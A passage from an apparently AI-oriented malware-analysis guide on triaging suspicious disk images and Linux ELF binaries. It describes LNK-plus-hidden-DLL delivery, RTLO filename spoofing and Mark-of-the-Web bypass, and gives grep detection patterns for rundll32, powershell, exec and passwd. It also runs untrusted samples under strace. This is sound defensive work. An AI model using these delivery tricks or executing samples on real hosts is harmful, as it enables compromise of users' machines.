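    info["ZoneName"] = ZONES.get(int(info.get("ZoneId", -1)), "unknown")
    return info
```

A downloaded image normally carries `ZoneId=3`, while the files copied out of the mounted image have no such stream, which is the gap the technique exploits.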

Detection

file suspicious.iso
# "ISO 9660 CD-ROM filesystem data"

file suspicious.img
# "DOS/MBR boot sector" or "Linux rev 1.0 ext2 filesystem data"

file suspicious.vhd
# "Microsoft Disk Image, Virtual Server or Virtual PC, version 0x00010000"

file suspicious.vhdx
# "Microsoft Disk Image eXtended"

Analysis Approach

Always analyze disk images read-only and without executing any contained files outside an isolated VM.

Option A: Extract Without Mounting (Safest — 7-Zip)

Works on Linux, Windows, and macOS. No kernel interaction required.

# List contents first
7z l suspicious.iso

# Extract to isolated directory
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/

# Identify all extracted files (recursive; -exec copes with spaces in names)
find /tmp/iso_contents/ -type f -exec file {} +

Option B: Mount Read-Only (Linux)

# ISO / IMG
sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso

# List all files including hidden
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f

# Identify file types
find /mnt/suspicious_iso/ -type f -exec file {} \;

# Copy files out for analysis (do not execute in place)
cp -r /mnt/suspicious_iso/ /tmp/iso_extracted/

# Unmount when done
sudo umount /mnt/suspicious_iso

Option C: Mount Read-Only (Windows — analysis VM only)

# Mount as read-only virtual drive
$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$driveLetter = ($img | Get-Volume).DriveLetter

# List all files including hidden
Get-ChildItem "${driveLetter}:\" -Recurse -Force | Select FullName, Attributes, Length

# Copy contents for analysis
Copy-Item "${driveLetter}:\*" "C:\analysis\extracted\" -Recurse -Force

# Dismount
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"

VHD/VHDX on Linux:

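# Install qemu tools if needed
sudo apt install qemu-utils

# Convert to raw for mounting (use -f vhdx for .vhdx images)
qemu-img convert -f vpc -O raw suspicious.vhd suspicious_raw.img

# Attach read-only with partition scanning, then mount the first partition (assumes a partitioned image)
LOOP=$(sudo losetup --find --show --read-only --partscan suspicious_raw.img)
sudo mkdir -p /mnt/vhd_mount
sudo mount -o ro "${LOOP}p1" /mnt/vhd_mount/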

What to Look For

1. LNK + Hidden DLL/EXE (Most Common Pattern)

The canonical ISO malware delivery pattern:

archive.iso/
  Invoice.lnk          <- Victim double-clicks this
  document.pdf          <- Decoy shown to victim
  payload.dll           <- Hidden (file attribute set); executed by LNK via rundll32

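# Linux typically lists files regardless of the Windows hidden attribute, so review the full listing
ls -la /mnt/suspicious_iso/
# Also catch Unix-style dotfiles
find /mnt/suspicious_iso/ -name ".*"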

# Analyze LNK files
lnkinfo Invoice.lnk   # Linux
strings Invoice.lnk | grep -E "\.exe|\.dll|rundll32|cmd|powershell"

2. Decoy Documents

Disk images frequently contain a visible, benign-looking document (PDF, DOCX) displayed to the victim while the payload runs in the background. Flag any document files and analyze them separately using the appropriate section of this skill.

3. File Naming Tricks

# Check for double extensions and right-to-left override (RTLO) tricks
ls -la /mnt/suspicious_iso/
# e.g. "invoice" + U+202E (RTLO) + "cod.exe" displays as "invoiceexe.doc", yet the real extension is .exe

# Detect non-ASCII characters in filenames (cat -v would mask them, so match raw bytes instead)
find /mnt/suspicious_iso/ -print | LC_ALL=C grep -n '[^ -~]'
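Filename spoofing checks are easier to reason about when each name is inspected character by character. The sketch below flags bidirectional control characters and other non-ASCII content; `filename_flags` is a hypothetical helper and the wording of the flags is arbitrary.

```python
import unicodedata

# Explicit bidirectional embedding, override, and isolate controls.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

def filename_flags(name: str) -> list:
    """Return human-readable warnings for a single file name."""
    flags = []
    if any(ch in BIDI_CONTROLS for ch in name):
        flags.append("bidirectional control character (possible RTLO spoofing)")
    if any(unicodedata.category(ch) == "Cf" for ch in name if ch not in BIDI_CONTROLS):
        flags.append("other invisible format character")
    if any(ord(ch) > 0x7F for ch in name):
        flags.append("non-ASCII character")
    return flags
```

Legitimate non-English file names will trigger the non-ASCII flag, so treat it as a prompt to look closer and not as a verdict.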

4. Autorun Configuration

# Check for autorun.inf (older technique, still seen in IMG files)
cat /mnt/suspicious_iso/autorun.inf 2>/dev/null

Contained File Routing

Once files are extracted, route each to the appropriate analysis path:

Extracted File Type	Next Step
`.lnk`	LNK Analysis section (this skill)
`.dll` / `.exe` (PE)	malware-triage then malware-dynamic-analysis
`.ps1` / `.vbs` / `.js`	Script Analysis section (this skill)
`.docm` / `.xlsm`	Office Macro Analysis section (this skill)
`.hta`	HTA Analysis section (this skill)
Nested `.zip` / `.iso`	Repeat disk image / archive analysis

Analysis Checklist - Disk Images

File type confirmed (`file` command)
Contents listed before extraction
Extracted to isolated directory (read-only mount or 7-Zip)
All files identified with `file` command (do not trust extensions)
Hidden files checked (`-a` flag / `Get-ChildItem -Force`)
LNK files analyzed — target, arguments, working directory documented
Decoy documents identified
RTLO / double-extension filename tricks checked
autorun.inf inspected (if present)
Payload files routed to appropriate analysis skill
MOTW bypass technique documented in report

Linux / ELF Binary Analysis

Detection

file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"

Static Analysis

ELF Header:

readelf -h sample.bin

# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset
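The first fields that `readelf -h` prints sit at fixed offsets, so they can be read with `struct` on systems where binutils is not installed. This is a minimal sketch covering only class, byte order, machine, and entry point; `parse_elf_header` and the short `MACHINES` table are illustrative names.

```python
import struct

MACHINES = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64"}

def parse_elf_header(data: bytes) -> dict:
    """Decode class, byte order, machine, and entry point from an ELF header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64 = data[4] == 2                     # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"    # EI_DATA: 1 = little, 2 = big
    # e_type, e_machine, e_version follow the 16-byte e_ident array.
    _e_type, e_machine, _e_version = struct.unpack_from(endian + "HHI", data, 16)
    (entry,) = struct.unpack_from(endian + ("Q" if is_64 else "I"), data, 24)
    return {"bits": 64 if is_64 else 32,
            "endianness": "little" if endian == "<" else "big",
            "machine": MACHINES.get(e_machine, hex(e_machine)),
            "entry_point": hex(entry)}
```

Passing the first 64 bytes of the sample is sufficient for these fields.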

Sections:

readelf -S sample.bin

# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)
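"High entropy" can be made concrete with a Shannon entropy calculation over a section's bytes. The function below is a standard formulation; the idea that values above roughly 7 bits per byte suggest packing or encryption is a rule of thumb, not a hard threshold.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())
```

Section bytes can be carved out using the offset and size columns printed by `readelf -S`.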

Imported Libraries:

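# Do not run ldd on untrusted binaries: it can execute code from the sample
readelf -d sample.bin | grep NEEDED
objdump -p sample.bin | grep NEEDED

# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)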

Imported Symbols:

nm -D sample.bin
objdump -T sample.bin

# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"

Strings:

strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"

Dynamic Analysis (Linux)

strace - System Call Monitoring:

# Monitor all system calls
strace -f ./sample.bin 2>&1 | tee strace_output.txt

# Monitor specific calls
strace -e trace=network,file,process ./sample.bin

# File operations only (modern binaries usually call openat rather than open)
strace -e trace=open,openat,read,write,close ./sample.bin

# Network operations only
strace -e trace=socket,connect,sendto,recvfrom ./sample.bin
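Saved strace output can be mined for network IOCs after the run. The sketch below pulls IPv4 endpoints out of `connect()` lines; `connect_targets` is a hypothetical helper, and it assumes strace's default formatting for `AF_INET` socket addresses, ignoring IPv6 and Unix sockets.

```python
import re

CONNECT = re.compile(
    r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
    r'sin_addr=inet_addr\("([\d.]+)"\)\}'
)

def connect_targets(strace_text: str):
    """Return sorted unique (ip, port) pairs from IPv4 connect() calls."""
    return sorted({(ip, int(port)) for port, ip in CONNECT.findall(strace_text)})
```

Run it over the contents of `strace_output.txt`, then add the results to the report's IOC list.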

ltrace - Library Call Monitoring:

ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt

Check for Packing:

# UPX detection (packed ELF files usually lack section headers, so search for the UPX! marker)
strings -a sample.bin | grep "UPX!"

# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin

Analysis Checklist - ELF

Architecture identified (x86/x64/ARM)
Imported libraries documented
Suspicious functions identified
Packing detected and removed (if UPX)
Strings extracted and analyzed
System calls monitored (strace)
Network activity captured
File operations documented

Integration with Report Writing

Each file type contributes specific sections to the malware analysis report:

.NET Analysis →

Decompiled code snippets
Embedded resource descriptions
Obfuscation techniques used
Reflective loading mechanisms

Office Macros →

Macro code (sanitized)
Auto-execution methods
Download URLs
Payload dropping process

PDF Analysis →

Embedded JavaScript
Auto-action triggers
Exploit CVEs (if applicable)
Shellcode presence

Scripts →

Deobfuscated code
Execution flow
Download cradles
C2 communications

Archives/LNK →

Archive structure
Masquerading techniques
LNK target analysis
Social engineering aspects

HTA Files →

Extracted VBScript/JScript
ActiveX objects abused
Download cradle URLs
PowerShell invocation chains

Disk Images (ISO/VHD) →

Container structure and hidden files
MOTW bypass technique documented
LNK target and payload relationship
Decoy document identified

ELF Binaries →

System calls used
Network protocols
Persistence mechanisms (cron, systemd)
Rootkit indicators

Tool Quick Reference

File Type	Primary Tool	Secondary Tool
.NET	dnSpy	ILSpy, de4dot
Office Macros	oledump.py	olevba, XLMMacroDeobfuscator
PDF	pdfid.py, pdf-parser.py	peepdf
PowerShell	PSDecode	Manual analysis
VBScript/JS	Text editor + analysis	js-beautify
HTA	Text editor + grep	CyberChef (decode), Process Monitor (dynamic)
ISO/IMG/VHD/VHDX	7-Zip (extract), mount -o ro (Linux)	Mount-DiskImage (Windows), qemu-utils (VHD)
Archives	7z, unzip, tar	-
LNK	LECmd (Win), lnkinfo (Linux)	strings
ELF	readelf, nm, objdump	strace, ltrace

Best Practices

Do:

Always identify file type first (`file` command)
Extract in isolated environments
Document obfuscation techniques
Save original and deobfuscated versions
Test extracted IOCs for accuracy
Cross-reference with VirusTotal/MalwareBazaar

Don't:

Execute scripts without understanding them first
Trust file extensions (check magic bytes)
Skip deobfuscation steps
Extract archives directly to important directories
Assume password-protected = safe

Example Usage

User request: "I have a suspicious .docm file with macros, help me analyze it"

Workflow:

Confirm file type (Office document)
Use oledump.py to list streams
Extract VBA macro code
Identify auto-execution functions
Decode obfuscated strings
Extract download URLs and IOCs
Document payload delivery method
Prepare findings for report